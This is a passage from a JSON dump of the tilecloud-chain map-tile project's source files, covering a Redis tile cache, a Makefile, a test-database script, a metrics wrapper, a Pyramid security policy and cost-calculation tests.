\"PATH_INFO\": \"/wmts/1.0.0/point_hash/default/2012/swissgrid_5/1/11/14.png\"},\n start_response,\n )\n self.assertEqual(code, \"200 OK\")\n self.assertEqual(headers[\"Cache-Control\"], \"max-age=28800\")\n\n result = serve(\n server.tilegeneration.get_main_config(),\n \"tilegeneration/test-serve.yaml\",\n {\"QUERY_STRING\": \"\", \"PATH_INFO\": \"/wmts/1.0.0/WMTSCapabilities.xml\"},\n start_response,\n )\n self.assertEqual(code, \"200 OK\")\n self.assert_result_equals(\n result[0].decode(\"utf-8\"),\n CAPABILITIES,\n regex=True,\n )\n\n os.environ[\"TILE_NB_THREAD\"] = tile_mbt\n os.environ[\"METATILE_NB_THREAD\"] = metatile_mbt\n\n def test_ondemend_wmtscapabilities(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n server.pyramid_server = None\n server.tilegeneration = None\n request = DummyRequest()\n request.registry.settings = {\n \"tilegeneration_configfile\": \"tilegeneration/test-serve-wmtscapabilities.yaml\",\n }\n request.matchdict[\"path\"] = [\"wmts\", \"1.0.0\", \"WMTSCapabilities.xml\"]\n PyramidView(request)()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"application/xml\")\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n CAPABILITIES,\n regex=True,\n )\n log_capture.check()\n" }, { "alpha_fraction": 0.5760483145713806, "alphanum_fraction": 0.5779436230659485, "avg_line_length": 34.322174072265625, "blob_id": "815b62e6ffc5435d90d58d8c1726bc2ba1ed1f32", "content_id": "2718f87ceefc58ebbd7557a89a4b1036ec80de3d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8442, "license_type": "permissive", "max_line_length": 107, "num_lines": 239, "path": "/tilecloud_chain/internal_mapcache.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import collections\nimport contextlib\nimport datetime\nimport json\nimport logging\nimport os\nimport struct\nimport sys\nimport threading\nfrom typing import TYPE_CHECKING, Any, Dict, Iterator, Optional, TypeVar, cast\n\nimport redis.sentinel\n\nimport tilecloud_chain.configuration\nfrom tilecloud import Tile, TileCoord, TileStore\nfrom tilecloud_chain import Run\nfrom tilecloud_chain.generate import Generate\n\nif TYPE_CHECKING:\n from tilecloud_chain.server import Server\n\nMAX_GENERATION_TIME = 60\nLOG = logging.getLogger(__name__)\nlock = threading.Lock()\nexecuting_lock = threading.Lock()\n_generator = None\n\n\ndef _decode_tile(data: bytes, tile: Tile) -> None:\n \"\"\"Decode a tile.\"\"\"\n image_len = struct.unpack(\"q\", data[:8])[0]\n tile.data = data[8 : (image_len + 8)]\n other = json.loads((data[(8 + image_len) :]).decode(\"utf-8\"))\n tile.content_encoding = other[\"content_encoding\"]\n tile.content_type = other[\"content_type\"]\n\n\ndef _encode_tile(tile: Tile) -> bytes:\n \"\"\"Encode a tile.\"\"\"\n other = {\"content_encoding\": tile.content_encoding, \"content_type\": tile.content_type}\n assert tile.data\n data = struct.pack(\"q\", len(tile.data)) + tile.data + json.dumps(other).encode(\"utf-8\")\n return data\n\n\nclass RedisStore(TileStore):\n \"\"\"A store based on Redis.\"\"\"\n\n def __init__(self, config: tilecloud_chain.configuration.Redis, **kwargs: Any):\n \"\"\"Initialize.\"\"\"\n super().__init__(**kwargs)\n\n connection_kwargs = {}\n if \"socket_timeout\" in config:\n connection_kwargs[\"socket_timeout\"] = config[\"socket_timeout\"]\n if \"db\" in config:\n connection_kwargs[\"db\"] = config[\"db\"]\n if \"url\" in config:\n self._master = redis.Redis.from_url(config[\"url\"], **connection_kwargs) # type: ignore\n self._slave = self._master\n else:\n sentinels = [(host, int(port)) for host, port in config[\"sentinels\"]]\n sentinel = redis.sentinel.Sentinel(sentinels, **connection_kwargs) # type: ignore\n self._master = sentinel.master_for(config.get(\"service_name\", \"mymaster\"))\n self._slave = sentinel.slave_for(config.get(\"service_name\", \"mymaster\"))\n self._prefix = config[\"prefix\"]\n self._expiration = config[\"expiration\"]\n\n def get_one(self, tile: Tile) -> Optional[Tile]:\n \"\"\"See in superclass.\"\"\"\n key = self._get_key(tile)\n data = self._slave.get(key)\n if data is None:\n LOG.debug(\"Tile not found: %s/%s\", tile.metadata[\"layer\"], tile.tilecoord)\n return None\n _decode_tile(data, tile)\n LOG.debug(\"Tile found: %s/%s\", tile.metadata[\"layer\"], tile.tilecoord)\n return tile\n\n def put_one(self, tile: Tile) -> Tile:\n \"\"\"See in superclass.\"\"\"\n key = self._get_key(tile)\n self._master.set(key, _encode_tile(tile), ex=self._expiration)\n LOG.info(\"Tile saved: %s/%s\", tile.metadata[\"layer\"], tile.tilecoord)\n return tile\n\n def delete_one(self, tile: Tile) -> Tile:\n \"\"\"See in superclass.\"\"\"\n key = self._get_key(tile)\n self._master.delete(key)\n return tile\n\n def _get_key(self, tile: Tile) -> str:\n return (\n f\"{self._prefix}_{tile.metadata['config_file']}_{tile.metadata['layer']}_\"\n f\"{tile.tilecoord.z}_{tile.tilecoord.x}_{tile.tilecoord.y}\"\n )\n\n @contextlib.contextmanager\n def lock(self, tile: Tile) -> Iterator[None]:\n \"\"\"Lock a tile.\"\"\"\n key = self._get_key(tile) + \"_l\"\n with self._master.lock(key, timeout=MAX_GENERATION_TIME):\n yield\n\n\nclass Generator:\n \"\"\"Get the tile from the cache (Redis) or generated it on the WMS server.\"\"\"\n\n def __init__(self, tilegeneration: tilecloud_chain.TileGeneration) -> None:\n \"\"\"Initialize.\"\"\"\n redis_config = tilegeneration.get_main_config().config[\"redis\"]\n self._cache_store = RedisStore(redis_config)\n log_level = os.environ.get(\"TILE_MAPCACHE_LOGLEVEL\")\n generator = Generate(\n collections.namedtuple( # type: ignore\n \"Options\",\n [\n \"verbose\",\n \"debug\",\n \"quiet\",\n \"role\",\n \"near\",\n \"time\",\n \"daemon\",\n \"local_process_number\",\n \"tiles\",\n ],\n )(\n log_level == \"verbose\", # type: ignore\n log_level == \"debug\",\n log_level == \"quiet\",\n \"server\",\n True,\n False,\n True,\n None,\n None,\n ),\n tilegeneration,\n out=sys.stdout,\n server=True,\n )\n generator._generate_tiles()\n self.run = Run(tilegeneration, tilegeneration.functions_metatiles)\n\n def read_from_cache(self, tile: Tile) -> Optional[Tile]:\n \"\"\"Get the tile from the cache (Redis).\"\"\"\n return self._cache_store.get_one(tile)\n\n def compute_tile(self, tile: Tile) -> None:\n \"\"\"Create the tile.\"\"\"\n self.run(tile)\n for tile_ in tile.metadata[\"tiles\"].values(): # type: ignore\n self._cache_store.put_one(tile_)\n\n @contextlib.contextmanager\n def lock(self, tile: Tile) -> Iterator[None]:\n \"\"\"Lock the tile.\"\"\"\n with self._cache_store.lock(tile):\n yield\n\n\ndef _get_generator(tilegeneration: tilecloud_chain.TileGeneration) -> Generator:\n if _generator is None:\n return _init_generator(tilegeneration)\n return _generator\n\n\ndef _init_generator(tilegeneration: tilecloud_chain.TileGeneration) -> Generator:\n with lock:\n global _generator # pylint: disable=global-statement\n if _generator is None:\n _generator = Generator(tilegeneration)\n return _generator\n\n\nResponse = TypeVar(\"Response\")\n\n\ndef fetch(\n config: tilecloud_chain.DatedConfig,\n server: \"Server[Response]\",\n tilegeneration: tilecloud_chain.TileGeneration,\n layer: tilecloud_chain.configuration.Layer,\n tile: Tile,\n kwargs: Dict[str, Any],\n) -> Response:\n \"\"\"Fetch a time in the cache (redis) or get it on the WMS server.\"\"\"\n generator = _get_generator(tilegeneration)\n fetched_tile = generator.read_from_cache(tile)\n backend = \"redis\"\n if fetched_tile is None:\n backend = \"wms-wait\"\n\n tile.metadata.setdefault(\"tiles\", {}) # type: ignore\n meta_tile = tile\n if layer[\"meta\"]:\n meta_tile = Tile(\n tilecoord=tile.tilecoord.metatilecoord(layer[\"meta_size\"]), metadata=tile.metadata\n )\n\n with generator.lock(meta_tile):\n fetched_tile = generator.read_from_cache(tile)\n if fetched_tile is None:\n backend = \"wms-generate\"\n generator.compute_tile(meta_tile)\n\n if meta_tile.error:\n LOG.error(\"Tile '%s' in error: %s\", meta_tile.tilecoord, meta_tile.error)\n return server.error(config, 500, \"Error while generate the tile, see logs for details\")\n\n # Don't fetch the just generated tile\n tiles: Dict[TileCoord, Tile] = cast(Dict[TileCoord, Tile], meta_tile.metadata[\"tiles\"])\n try:\n fetched_tile = tiles[tile.tilecoord]\n except KeyError:\n LOG.exception(\n \"Try to get the tile '%s', from the available: '%s'\",\n tile.tilecoord,\n \", \".join([str(e) for e in tiles.keys()]),\n )\n raise\n\n response_headers = {\n \"Expires\": (\n datetime.datetime.utcnow() + datetime.timedelta(hours=server.get_expires_hours(config))\n ).isoformat(),\n \"Cache-Control\": f\"max-age={3600 * server.get_expires_hours(config)}\",\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"GET\",\n \"Tile-Backend\": backend,\n }\n if fetched_tile.content_encoding:\n response_headers[\"Content-Encoding\"] = fetched_tile.content_encoding\n if fetched_tile.content_type:\n response_headers[\"Content-Type\"] = fetched_tile.content_type\n assert fetched_tile.data is not None\n return server.response(config, fetched_tile.data, headers=response_headers, **kwargs)\n" }, { "alpha_fraction": 0.6935807466506958, "alphanum_fraction": 0.7066198587417603, "avg_line_length": 32.79661178588867, "blob_id": "0969579e326d1ceb091e872c1e17ab4387c6d515", "content_id": "8ca29f355ba60092aecc3729324a754e8d172304", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1994, "license_type": "permissive", "max_line_length": 124, "num_lines": 59, "path": "/Makefile", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "export DOCKER_BUILDKIT=1\nVERSION = $(strip $(shell poetry version --short))\n\n.PHONY: help\nhelp: ## Display this help message\n\t@echo \"Usage: make <target>\"\n\t@echo\n\t@echo \"Available targets:\"\n\t@grep --extended-regexp --no-filename '^[a-zA-Z_-]+:.*## ' $(MAKEFILE_LIST) | sort | \\\n\t\tawk 'BEGIN {FS = \":.*?## \"}; {printf \"\t%-20s%s\\n\", $$1, $$2}'\n\nPHONY: build\nbuild: ## Build all Docker images\n\tdocker build --tag=camptocamp/tilecloud-chain-tests --target=tests .\n\tdocker build --tag=camptocamp/tilecloud-chain --build-arg=VERSION=$(VERSION) .\n\nPHONY: checks\nchecks: prospector ## Run the checks\n\nPHONY: prospector\nprospector: ## Run Prospector\n\tdocker run --rm --volume=${PWD}:/app camptocamp/tilecloud-chain-tests prospector --output-format=pylint --die-on-tool-error\n\nPHONY: tests\ntests: build ## Run the unit tests\n\tdocker-compose stop --timeout=0\n\tdocker-compose down || true\n\tC2C_AUTH_GITHUB_CLIENT_ID=$(shell gopass show gs/projects/github/oauth-apps/geoservices-int/client-id) \\\n\tC2C_AUTH_GITHUB_CLIENT_SECRET=$(shell gopass show gs/projects/github/oauth-apps/geoservices-int/client-secret) \\\n\tdocker-compose up -d\n\n\t# Wait for DB to be up\n\twhile ! docker-compose exec -T test psql -h db -p 5432 -U postgres -v ON_ERROR_STOP=1 -c \"SELECT 1\" -d tests; \\\n\tdo \\\n\t\techo \"Waiting for DB to be UP\"; \\\n\t\tsleep 1; \\\n\tdone\n\n\tc2cciutils-docker-logs\n\n\tdocker-compose exec -T test pytest -vv --color=yes\n\n\tc2cciutils-docker-logs\n\tdocker-compose down\n\nPHONY: tests-fast\ntests-fast:\n\tC2C_AUTH_GITHUB_CLIENT_ID=$(shell gopass show gs/projects/github/oauth-apps/geoservices-int/client-id) \\\n\tC2C_AUTH_GITHUB_CLIENT_SECRET=$(shell gopass show gs/projects/github/oauth-apps/geoservices-int/client-secret) \\\n\tdocker-compose up -d\n\n\t# Wait for DB to be up\n\twhile ! docker-compose exec -T test psql -h db -p 5432 -U postgres -v ON_ERROR_STOP=1 -c \"SELECT 1\" -d tests; \\\n\tdo \\\n\t\techo \"Waiting for DB to be UP\"; \\\n\t\tsleep 1; \\\n\tdone\n\n\tdocker-compose exec -T test pytest -vv --color=yes --exitfirst #--last-failed\n" }, { "alpha_fraction": 0.6752577424049377, "alphanum_fraction": 0.6958763003349304, "avg_line_length": 37.79999923706055, "blob_id": "bcf4377104ebcfc8474ac590f4ab3b2109b06e90", "content_id": "5fb3306d5bf94020819b147f0380264fa58648eb", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 194, "license_type": "permissive", "max_line_length": 67, "num_lines": 5, "path": "/tilecloud_chain/tests/create_test_data.sh", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "#!/bin/bash -e\n\ncreatedb -E UTF8 -T template0 tests-deploy\npsql -q -d tests-deploy -c \"CREATE TABLE test (name varchar(10));\"\npsql -q -d tests-deploy -c \"INSERT INTO test VALUES ('referance');\"\n" }, { "alpha_fraction": 0.5783772468566895, "alphanum_fraction": 0.5794392228126526, "avg_line_length": 33.36496353149414, "blob_id": "36f54ef43cfe80e1997a09d31d7dd28135cf5449", "content_id": "08a440e3403318aed00df337b2c1aa8473a7fe97", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4708, "license_type": "permissive", "max_line_length": 110, "num_lines": 137, "path": "/tilecloud_chain/timedtilestore.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import time\nfrom typing import Any, Iterable, Iterator, Optional, TypeVar, cast\n\nfrom prometheus_client import Summary\n\nfrom tilecloud import BoundingPyramid, Tile, TileStore\n\n_OPTIONAL_TILE_OR_NOT = TypeVar(\"_OPTIONAL_TILE_OR_NOT\", Optional[Tile], Tile)\n\n_TILESTORE_OPERATION_SUMMARY = Summary(\n \"tilecloud_chain_tilestore\", \"Number of tilestore contains\", [\"layer\", \"host\", \"store\", \"operation\"]\n)\n_LEN_SUMMARY = Summary(\"tilecloud_chain_tilestore_len\", \"Number of tilestore len\", [\"store\"])\n\n\nclass TimedTileStoreWrapper(TileStore):\n \"\"\"A wrapper around a TileStore that adds timer metrics.\"\"\"\n\n def __init__(self, tile_store: TileStore, store_name: str) -> None:\n \"\"\"Initialize.\"\"\"\n super().__init__()\n self._tile_store = tile_store\n self._store_name = store_name\n\n def _time_iteration(\n self, generator: Iterable[_OPTIONAL_TILE_OR_NOT], operation: str\n ) -> Iterator[_OPTIONAL_TILE_OR_NOT]:\n while True:\n start = time.perf_counter()\n try:\n tile = next(generator) # type: ignore\n except StopIteration:\n break\n except RuntimeError as exception:\n if isinstance(exception.__cause__, StopIteration):\n # since python 3.7, a StopIteration is wrapped in a RuntimeError (PEP 479)\n break\n else:\n raise\n _TILESTORE_OPERATION_SUMMARY.labels(\n tile.metadata.get(\"layer\", \"none\"),\n tile.metadata.get(\"host\", \"none\"),\n self._store_name,\n operation,\n ).observe(time.perf_counter() - start)\n yield tile\n\n def __contains__(self, tile: Tile) -> bool:\n \"\"\"See in superclass.\"\"\"\n\n with _TILESTORE_OPERATION_SUMMARY.labels(\n tile.metadata.get(\"layer\", \"none\"),\n tile.metadata.get(\"host\", \"none\"),\n self._store_name,\n \"contains\",\n ).time():\n return self._tile_store.__contains__(tile)\n\n def __len__(self) -> int:\n \"\"\"See in superclass.\"\"\"\n\n with _LEN_SUMMARY.labels(\n self._store_name,\n ).time():\n return self._tile_store.__len__()\n\n def delete(self, tiles: Iterable[Tile]) -> Iterator[Tile]:\n \"\"\"See in superclass.\"\"\"\n\n return self._time_iteration(self._tile_store.delete(tiles), \"delete\")\n\n def delete_one(self, tile: Tile) -> Tile:\n \"\"\"See in superclass.\"\"\"\n\n with _TILESTORE_OPERATION_SUMMARY.labels(\n tile.metadata.get(\"layer\", \"none\"),\n tile.metadata.get(\"host\", \"none\"),\n self._store_name,\n \"delete_one\",\n ).time():\n return self._tile_store.delete_one(tile)\n\n def list(self) -> Iterable[Tile]:\n \"\"\"See in superclass.\"\"\"\n\n return cast(Iterable[Tile], self._time_iteration(self._tile_store.list(), \"list\"))\n\n def get(self, tiles: Iterable[Optional[Tile]]) -> Iterator[Optional[Tile]]:\n \"\"\"See in superclass.\"\"\"\n\n return self._time_iteration(self._tile_store.get(tiles), \"get\")\n\n def get_all(self) -> Iterator[Optional[Tile]]:\n \"\"\"See in superclass.\"\"\"\n\n return self._time_iteration(self._tile_store.get_all(), \"get_all\")\n\n def get_one(self, tile: Tile) -> Optional[Tile]:\n \"\"\"See in superclass.\"\"\"\n\n with _TILESTORE_OPERATION_SUMMARY.labels(\n tile.metadata.get(\"layer\", \"none\"), tile.metadata.get(\"host\", \"none\"), self._store_name, \"get_one\"\n ).time():\n return self._tile_store.get_one(tile)\n\n def put(self, tiles: Iterable[Tile]) -> Iterator[Tile]:\n \"\"\"See in superclass.\"\"\"\n\n return cast(Iterator[Tile], self._time_iteration(self._tile_store.put(tiles), \"put\"))\n\n def put_one(self, tile: Tile) -> Tile:\n \"\"\"See in superclass.\"\"\"\n\n with _TILESTORE_OPERATION_SUMMARY.labels(\n tile.metadata.get(\"layer\", \"none\"), tile.metadata.get(\"host\", \"none\"), self._store_name, \"put_one\"\n ).time():\n return self._tile_store.put_one(tile)\n\n def __getattr__(self, item: str) -> Any:\n \"\"\"See in superclass.\"\"\"\n\n return getattr(self._tile_store, item)\n\n def get_bounding_pyramid(self) -> BoundingPyramid:\n \"\"\"See in superclass.\"\"\"\n\n return self._tile_store.get_bounding_pyramid()\n\n def get_cheap_bounding_pyramid(self) -> Optional[BoundingPyramid]:\n \"\"\"See in superclass.\"\"\"\n\n return self._tile_store.get_cheap_bounding_pyramid()\n\n def __str__(self) -> str:\n \"\"\"Get string representation.\"\"\"\n\n return f\"tilecloud_chain.timedtilestore.TimedTileStoreWrapper: {self._tile_store}\"\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 15, "blob_id": "16255ff45d698b069346ce280d2e70fddc88e9b9", "content_id": "1c586ae8b16d22e4fbd4c415d0dce08e1166eaea", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 48, "license_type": "permissive", "max_line_length": 24, "num_lines": 3, "path": "/.coveragerc", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "[run]\nsource = tilecloud_chain\nomit = */tests/*\n" }, { "alpha_fraction": 0.5558080077171326, "alphanum_fraction": 0.5586481094360352, "avg_line_length": 31.302751541137695, "blob_id": "91f78becc5d1298dc0e9dfba16e32a6420495b4f", "content_id": "7b94b6a4384410167d9f668c1f31b9d96faf3bca", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3521, "license_type": "permissive", "max_line_length": 100, "num_lines": 109, "path": "/tilecloud_chain/security.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nfrom typing import Optional, Union\n\nimport c2cwsgiutils.auth\nimport pyramid.request\nfrom c2cwsgiutils.auth import AuthConfig\nfrom pyramid.security import Allowed, Denied\n\n\nclass User:\n \"\"\"The user definition.\"\"\"\n\n login: Optional[str]\n name: Optional[str]\n url: Optional[str]\n is_auth: bool\n token: Optional[str]\n is_admin: bool\n request: pyramid.request.Request\n\n def __init__(\n self,\n auth_type: str,\n login: Optional[str],\n name: Optional[str],\n url: Optional[str],\n is_auth: bool,\n token: Optional[str],\n request: pyramid.request.Request,\n ) -> None:\n self.auth_type = auth_type\n self.login = login\n self.name = name\n self.url = url\n self.is_auth = is_auth\n self.token = token\n self.request = request\n self.is_admin = c2cwsgiutils.auth.check_access(self.request)\n\n def has_access(self, auth_config: AuthConfig) -> bool:\n if self.is_admin:\n return True\n if \"github_repository\" in auth_config:\n return c2cwsgiutils.auth.check_access_config(self.request, auth_config) or self.is_admin\n\n return False\n\n\nclass SecurityPolicy:\n \"\"\"The pyramid security policy.\"\"\"\n\n def identity(self, request: pyramid.request.Request) -> User:\n \"\"\"Return app-specific user object.\"\"\"\n\n if not hasattr(request, \"user\"):\n if \"TEST_USER\" in os.environ:\n user = User(\n auth_type=\"test_user\",\n login=os.environ[\"TEST_USER\"],\n name=os.environ[\"TEST_USER\"],\n url=\"https://example.com/user\",\n is_auth=True,\n token=None,\n request=request,\n )\n else:\n is_auth, c2cuser = c2cwsgiutils.auth.is_auth_user(request)\n user = User(\n \"github_oauth\",\n c2cuser.get(\"login\"),\n c2cuser.get(\"name\"),\n c2cuser.get(\"url\"),\n is_auth,\n c2cuser.get(\"token\"),\n request,\n )\n setattr(request, \"user\", user)\n return request.user # type: ignore\n\n def authenticated_userid(self, request: pyramid.request.Request) -> Optional[str]:\n \"\"\"Return a string ID for the user.\"\"\"\n\n identity = self.identity(request)\n\n if identity is None:\n return None\n\n return identity.login\n\n def permits(\n self, request: pyramid.request.Request, context: AuthConfig, permission: str\n ) -> Union[Allowed, Denied]:\n \"\"\"Allow access to everything if signed in.\"\"\"\n\n identity = self.identity(request)\n\n if identity is None:\n return Denied(\"User is not signed in.\")\n if identity.auth_type in (\"test_user\",):\n return Allowed(f\"All access auth type: {identity.auth_type}\")\n if identity.is_admin:\n return Allowed(\"The User is admin.\")\n if permission == \"all\":\n return Denied(\"Root access is required.\")\n if permission not in context.get(\"sources\", {}): # type: ignore\n return Denied(f\"No such source '{permission}'.\")\n if identity.has_access(context[\"sources\"][permission]): # type: ignore\n return Allowed(f\"The User has access to source {permission}.\")\n return Denied(f\"The User has no access to source {permission}.\")\n" }, { "alpha_fraction": 0.3037698268890381, "alphanum_fraction": 0.36838191747665405, "avg_line_length": 44.869937896728516, "blob_id": "aa84733ff3567de87bf596411d3291806a295950", "content_id": "851c30cc817455e895dc07766de511a41700334e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21513, "license_type": "permissive", "max_line_length": 109, "num_lines": 469, "path": "/tilecloud_chain/tests/test_cost.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\n\nfrom tilecloud_chain import cost\nfrom tilecloud_chain.tests import CompareCase\n\n\nclass TestCost(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n os.chdir(os.path.dirname(__file__))\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n\n ZOOM_SUMMARY = \"\"\"\n%(tiles)s tiles in zoom %(zoom)s.\nTime to generate: %(time)s [d h:mm:ss]\nS3 PUT: %(s3)s [$]\"\"\"\n\n LAYER_SUMMARY = \"\"\"\nNumber of tiles: %(tiles)s\nGeneration time: %(time)s [d h:mm:ss]\nGeneration cost: %(cost)s [$]\"\"\"\n\n GLOBAL_SUMMARY = \"\"\"\n===== GLOBAL =====\nTotal number of tiles: %(tiles)s\nTotal generation time: %(time)s [d h:mm:ss]\nTotal generation cost: %(cost)s [$]\"\"\"\n\n FINAL_SUMMARY = \"\"\"\nS3 Storage: %(storage)s [$/month]\nS3 get: %(get)s [$/month]\n\"\"\"\n # CloudFront: %(cloudfront)s [$/month]\n\n def test_cost_point(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l point\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"\",\n \"2 meta tiles in zoom 0.\",\n \"2 meta tiles in zoom 1.\",\n \"2 meta tiles in zoom 2.\",\n \"2 meta tiles in zoom 3.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"6\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"6\", \"zoom\": \"1\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"6\", \"zoom\": \"2\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"6\", \"zoom\": \"3\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"24\", \"time\": \"0:00:00\", \"cost\": \"0.00\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_point_count(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l point --cost-algo count\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"\",\n \"1 meta tiles in zoom 0.\",\n \"1 meta tiles in zoom 1.\",\n \"6 meta tiles in zoom 2.\",\n \"2 meta tiles in zoom 3.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"64\", \"zoom\": \"0\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"64\", \"zoom\": \"1\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"339\", \"zoom\": \"2\", \"time\": \"0:00:10\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"112\", \"zoom\": \"3\", \"time\": \"0:00:03\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"579\", \"time\": \"0:00:17\", \"cost\": \"0.01\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_line(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l line\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n \"2 meta tiles in zoom 0.\",\n \"2 meta tiles in zoom 1.\",\n \"4 meta tiles in zoom 2.\",\n \"8 meta tiles in zoom 3.\",\n \"14 meta tiles in zoom 4.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"11\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"19\", \"zoom\": \"1\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"43\", \"zoom\": \"2\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"84\", \"zoom\": \"3\", \"time\": \"0:00:02\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"164\", \"zoom\": \"4\", \"time\": \"0:00:05\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"321\", \"time\": \"0:00:10\", \"cost\": \"0.00\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_line_count(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -d -c tilegeneration/test-fix.yaml -l line --cost-algo count\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n \"1 meta tiles in zoom 0.\",\n \"1 meta tiles in zoom 1.\",\n \"6 meta tiles in zoom 2.\",\n \"10 meta tiles in zoom 3.\",\n \"21 meta tiles in zoom 4.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"64\", \"zoom\": \"0\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"64\", \"zoom\": \"1\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"383\", \"zoom\": \"2\", \"time\": \"0:00:11\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"493\", \"zoom\": \"3\", \"time\": \"0:00:15\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"600\", \"zoom\": \"4\", \"time\": \"0:00:18\", \"s3\": \"0.01\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"1604\", \"time\": \"0:00:49\", \"cost\": \"0.02\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_polygon(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c 